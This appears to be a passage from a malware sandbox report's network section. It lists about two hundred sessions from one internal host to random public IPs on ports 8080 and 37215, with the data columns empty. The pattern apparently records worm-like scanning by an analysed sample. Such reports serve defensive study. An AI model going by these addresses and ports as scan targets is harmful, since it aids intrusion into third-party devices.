                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35675192.168.2.233766095.37.186.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35676192.168.2.2334420159.251.32.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35677192.168.2.2339964147.249.120.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35678192.168.2.2338552154.216.78.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35679192.168.2.2347980183.73.251.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35680192.168.2.234387448.25.210.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35681192.168.2.2348498104.205.82.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35682192.168.2.2340132198.15.206.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35683192.168.2.235013462.7.202.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35684192.168.2.2340102141.88.187.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35685192.168.2.233330860.246.45.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35686192.168.2.2358988133.204.141.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35687192.168.2.234904092.81.251.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35688192.168.2.234704668.183.99.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35689192.168.2.2354094186.28.123.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35690192.168.2.234625083.115.110.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35691192.168.2.2359542171.227.217.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35692192.168.2.2354366151.190.199.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35693192.168.2.235589890.228.17.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35694192.168.2.235992225.38.41.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35695192.168.2.2348084178.161.66.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35696192.168.2.233845427.42.12.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35697192.168.2.234227458.45.8.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35698192.168.2.234073495.73.143.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35699192.168.2.2337766163.29.190.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35700192.168.2.2347634175.167.216.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35701192.168.2.233723441.42.39.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35702192.168.2.2349276178.16.254.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35703192.168.2.2354062169.90.96.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35704192.168.2.2336020136.170.7.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35705192.168.2.23433781.197.25.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35706192.168.2.2339968135.86.194.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35707192.168.2.235066668.67.38.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35708192.168.2.2353040160.185.27.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35709192.168.2.2354690116.97.13.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35710192.168.2.235639424.61.125.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35711192.168.2.2346402135.27.213.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35712192.168.2.2347370119.178.243.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35713192.168.2.235162417.37.130.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35714192.168.2.235320269.182.133.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35715192.168.2.2351776114.1.192.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35716192.168.2.234887873.63.64.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35717192.168.2.2352742118.170.189.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35718192.168.2.234898040.132.152.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35719192.168.2.2355582223.191.86.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35720192.168.2.2346668165.104.179.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35721192.168.2.235948657.57.181.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35722192.168.2.2352390157.182.249.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35723192.168.2.2359904206.74.236.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35724192.168.2.2351360185.103.240.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35725192.168.2.2341496108.98.65.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35726192.168.2.235363651.22.151.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35727192.168.2.234091223.182.27.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35728192.168.2.235534295.212.207.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35729192.168.2.23373321.232.246.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35730192.168.2.2339928190.54.150.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35731192.168.2.233793462.47.3.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35732192.168.2.233279482.132.129.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35733192.168.2.2334456167.250.42.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35734192.168.2.234385218.171.201.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35735192.168.2.2345954118.50.151.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35736192.168.2.2351690107.72.82.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35737192.168.2.2334928138.160.215.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35738192.168.2.2345340149.69.122.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35739192.168.2.2353670198.87.245.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35740192.168.2.2338480106.206.6.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35741192.168.2.233408437.184.237.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35742192.168.2.2339972203.239.89.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35743192.168.2.2344550116.45.168.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35744192.168.2.2335174151.200.37.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35745192.168.2.2354382163.37.103.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35746192.168.2.2353702114.88.45.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35747192.168.2.2352038107.41.80.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35748192.168.2.234283879.167.216.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35749192.168.2.234151834.68.20.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35750192.168.2.2336044129.146.126.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35751192.168.2.2345102145.192.248.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35752192.168.2.234148892.53.2.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35753192.168.2.2341312205.75.47.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35754192.168.2.2340598187.243.137.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35755192.168.2.2351516211.98.76.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35756192.168.2.234970441.111.131.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35757192.168.2.233453041.121.16.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35758192.168.2.2345102157.224.237.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35759192.168.2.2334196168.185.52.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35760192.168.2.2345158112.0.250.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35761192.168.2.235989441.144.167.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35762192.168.2.2348168197.80.112.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35763192.168.2.2338858157.152.211.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35764192.168.2.2339628197.245.55.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35765192.168.2.233658641.97.217.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35766192.168.2.2347568152.41.24.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35767192.168.2.2351442197.114.150.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35768192.168.2.2347870157.101.93.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35769192.168.2.2343506197.149.200.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35770192.168.2.2360012118.105.68.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35771192.168.2.2356486157.93.208.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35772192.168.2.2358298174.108.34.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35773192.168.2.2349656150.29.155.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35774192.168.2.2332918157.205.164.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35775192.168.2.2334448157.145.148.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35776192.168.2.235563441.182.192.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35777192.168.2.2348998171.167.158.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35778192.168.2.233572241.169.225.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35779192.168.2.2348898197.52.131.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35780192.168.2.2348056197.205.98.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35781192.168.2.2336252205.97.151.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35782192.168.2.236016241.234.245.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35783192.168.2.2343744193.160.95.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35784192.168.2.233309241.7.21.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35785192.168.2.2356026107.55.65.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35786192.168.2.235593841.193.160.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35787192.168.2.236005841.126.102.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35788192.168.2.2337096197.95.125.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35789192.168.2.234213041.231.41.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35790192.168.2.233693841.234.228.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35791192.168.2.2359670157.48.217.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35792192.168.2.2340578157.140.73.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35793192.168.2.234988241.125.217.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35794192.168.2.2348624157.9.155.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35795192.168.2.2344964197.124.18.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35796192.168.2.2342614157.247.19.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35797192.168.2.234139441.31.12.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35798192.168.2.2347044197.114.68.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35799192.168.2.2338466102.108.8.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35800192.168.2.2358920157.161.159.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35801192.168.2.2348496157.30.113.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35802192.168.2.235974041.94.132.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35803192.168.2.2342386129.106.118.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35804192.168.2.2341254167.190.231.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35805192.168.2.2345452197.76.111.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35806192.168.2.234716441.156.245.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35807192.168.2.2344788197.111.105.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35808192.168.2.2342854110.99.251.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35809192.168.2.2340056197.253.60.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35810192.168.2.233452041.145.218.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35811192.168.2.2355614102.94.89.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35812192.168.2.2343672197.222.57.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35813192.168.2.2344464197.97.111.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35814192.168.2.235907041.149.121.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35815192.168.2.2360212197.37.4.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35816192.168.2.235445041.194.224.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35817192.168.2.2360316197.65.232.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35818192.168.2.235730241.104.79.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35819192.168.2.234286041.164.244.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35820192.168.2.233304641.74.134.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35821192.168.2.234032276.157.113.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35822192.168.2.2359210197.43.58.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35823192.168.2.2335512157.186.48.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35824192.168.2.2356844104.9.138.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35825192.168.2.2346260157.141.28.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35826192.168.2.2339926157.245.227.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35827192.168.2.2335696157.128.96.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35828192.168.2.2333724197.122.114.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35829192.168.2.2333808197.94.17.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35830192.168.2.2349898157.231.102.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35831192.168.2.234633071.206.45.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35832192.168.2.2359364197.167.97.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35833192.168.2.235830641.21.91.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35834192.168.2.2353550157.206.212.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35835192.168.2.2341188157.115.50.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35836192.168.2.2354684197.112.43.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35837192.168.2.2352648159.178.244.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35838192.168.2.2358054157.100.255.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35839192.168.2.2349442202.249.30.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35840192.168.2.2356554184.157.165.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35841192.168.2.233707041.45.86.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35842192.168.2.235692641.39.50.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35843192.168.2.233458641.195.248.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35844192.168.2.235021241.232.128.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35845192.168.2.2355460104.35.84.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35846192.168.2.2359564197.11.46.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35847192.168.2.2333156157.193.219.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35848192.168.2.2351842197.41.84.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35849192.168.2.235173841.143.44.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35850192.168.2.233687041.150.166.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35851192.168.2.2347870197.28.90.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35852192.168.2.236070241.204.10.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35853192.168.2.235554041.64.242.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35854192.168.2.2340810109.143.197.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35855192.168.2.2352074157.9.0.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35856192.168.2.2348200197.92.183.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35857192.168.2.2339790197.25.155.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35858192.168.2.236019441.199.208.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35859192.168.2.2356020157.120.14.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35860192.168.2.2337734157.146.199.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35861192.168.2.2359940197.224.193.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35862192.168.2.2350980206.220.190.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35863192.168.2.233587841.234.86.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35864192.168.2.2335556157.16.231.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35865192.168.2.2337816157.246.172.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35866192.168.2.2347486197.68.230.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35867192.168.2.2340898197.238.31.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35868192.168.2.2348924197.85.108.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35869192.168.2.234741479.182.172.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35870192.168.2.2352860136.85.50.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35871192.168.2.234551841.253.4.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35872192.168.2.2360754152.177.28.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35873192.168.2.235654241.230.212.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35874192.168.2.2349710197.63.129.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35875192.168.2.2350822157.14.227.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35876192.168.2.234682641.64.179.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35877192.168.2.234238241.220.26.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35878192.168.2.2347594197.135.123.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35879192.168.2.2355012157.250.21.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35880192.168.2.234440641.213.189.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35881192.168.2.2336610157.252.239.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35882192.168.2.2343502157.129.249.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35883192.168.2.2347968141.204.108.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
